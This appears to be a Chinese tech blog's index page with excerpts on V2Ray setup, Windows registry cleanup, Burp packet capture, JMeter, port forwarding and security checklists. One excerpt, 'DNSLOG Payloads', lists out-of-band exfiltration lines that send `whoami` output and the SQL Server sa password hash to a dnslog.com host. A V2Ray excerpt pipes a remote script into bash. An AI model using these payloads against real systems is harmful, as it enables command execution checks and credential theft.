NEW

扶墙需要你先了解V2Ray V2Ray服务器搭建

扶墙需要你先了解V2Ray V2Ray服务器搭建
安装 V2Ray 输入下面命令回车,你可以复制过去,然后在 Xshell 界面按 Shift + Insert 即可粘贴,不能按 Ctrl + V 的,Mac 下可以直接 commend + V 粘贴。 bash <(curl -s -L https://git.io/v2ray.sh) 如果提示 curl: command not found ,那是因为你的 VPS 没装 Curl ubuntu/debian 系统安装 Curl 方法: apt-get update -y && apt-get install curl -y cento...
2019年09月17日 汪洋大海 暂无评论 喜欢 0 阅读 22 views 次 阅读全文

删除win10“添加或删除程序”列表存在的程序名

删除win10“添加或删除程序”列表存在的程序名
程序已经卸载,但是在“添加或删除程序”中依然存在 可能原因 注册表相关项没删除 解决方案 WIN10 删除注册表相关项 1.先紧按住键盘【windows】键不要松开,再按【R】:   2. 输入“regedit”→【确定】:   3. 找到【HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall】项,找到对应的程序右键删除该项(本图文以QQ旋风为例,删除其他程序方法...
2019年09月09日 汪洋大海 暂无评论 喜欢 0 阅读 30 views 次 阅读全文

AttributeError: ‘str’ object has no attribute ‘strftime’ 解决方法

AttributeError: ‘str’ object has no attribute ‘strftime’ 解决方法
所以我有一个使用以下进口的脚本:时遇到一个日期字符串转换为unix时间戳 import sys import os.path import requests import json import csv import glob2 import shutil from time import sleep from time import gmtime, strftime import time from datetime import datetime 我想转换row[15]这是一个日期字符串,看起来像"23/03/2015 00:00"(...
2019年08月22日 汪洋大海 暂无评论 喜欢 0 阅读 80 views 次 阅读全文

burp抓包小程序解决方案 – 安卓微信7.0不能抓 https方法

burp抓包小程序解决方案 – 安卓微信7.0不能抓 https方法
前言 最近公司有个小程序要提测,研发提测,体验,发现有个疑似bug的东西,想着抓包看下是不是接口数据的问题,结果问题出现了,按照以前的常规操作,打开fiddler,设置ip代理(https证书已经安装了),结果一看,fiddler居然这样显示: 再看看手机,居然没数据?: 一脸疑问号,一开始以为是自己问题,折腾半天,不对,之前都是没问题的话,同样的环境,同样的设备...
2019年08月02日 汪洋大海 暂无评论 喜欢 0 阅读 324 views 次 阅读全文

libXss.so.1 not found on the system

libXss.so.1 not found on the system
执行安装文件 系统报错 [root@qyi-xsser tmp]# ./acunetix_trial.sh Acunetix Installer Version: v_190515149, Copyright (c) Acunetix ------------------------------------------------------------ Checking os... Checking for dependencies...     - dependency libXi.so.6 not found on the system     - dependency libpangocairo-1...
2019年07月26日 汪洋大海 暂无评论 喜欢 0 阅读 128 views 次 阅读全文

Web安全自查问题清单

Web安全自查问题清单
web自检清单 检查类型 说明 检查项 输入验证 概述 任何来自客户端的数据,如URL和参数、HTTP头部、 Javascript戓其他嵌入代码提交的信息,都属于不可信数据。在应用外部边界或内部每个组件或功能边界,都将其当做潜在的恶意输入来校验 白名单 不可信数据可以设定白名单校验的,应接受所有和白名单匹配的数据,并阻止其他数据 ...
2019年07月22日 汪洋大海 暂无评论 喜欢 0 阅读 280 views 次 阅读全文

DNSLOG Payloads

DNSLOG Payloads
0x00 Command Execution i. *nix: curl http://ip.port.b182oj.dnslog.com/`whoami` ping `whoami`.ip.port.b182oj.dnslog.com ii. windows ping %USERNAME%.b182oj.dnslog.com 0x01 SQL Injection i. SQL Server DECLARE @host varchar(1024); SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa') +'....
2019年07月17日 汪洋大海 暂无评论 喜欢 0 阅读 105 views 次 阅读全文

Jmeter 自增变量 参数化及自定义变量函数的使用

Jmeter 自增变量 参数化及自定义变量函数的使用
参数化是自动化测试脚本的一种常用技巧。简单来说,参数化的一般用法就是将脚本中的某些输入使用参数来代替,在脚本运行时指定参数的取值范围和规则; 这样,脚本在运行时就可以根据需要选取不同的参数值作为输入。这种方式通常被称为数据驱动测试(Data Driven Test),参数的取值范围被称为数据池(Data Pool)。   jmeter的test plan中,支持如下4种参数化方式: 函...
2019年07月16日 汪洋大海 暂无评论 喜欢 0 阅读 132 views 次 阅读全文

Windows命令自带端口转发命令

Windows命令自带端口转发命令
0x00 前言 在Windows系统中,从XP开始就内嵌了一个设置网络端口转发的功能。依靠这个功能,任何到本地端口的TCP连接(ipv4或者ipv6)都能够被转发到任意一个本地端口,甚至是远程主机的某个端口。并且,Windows系统并不需要去开启监听这个转发端口的服务。 在Linux中,配置端口转发十分容易,使用iptables配置规则即可。但是在Windows服务器中,远程访问控制协议(RRAS)通...
2019年07月10日 汪洋大海 暂无评论 喜欢 0 阅读 117 views 次 阅读全文

一些优秀的甲方安全开源项目收集

一些优秀的甲方安全开源项目收集
这是一份甲方安全开源项目清单,收集了一些比较优秀的安全开源项目,以帮助甲方安全从业人员构建企业安全能力。 这些开源项目,每一个都在致力于解决一些安全问题。 项目收集的思路: 一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。另一个是来自企业安全能力建设的需求,根据需求分类,如WAF、HIDS、Git监控等。 这个收集是一个长期的过...
2019年07月09日 汪洋大海 暂无评论 喜欢 0 阅读 138 views 次 阅读全文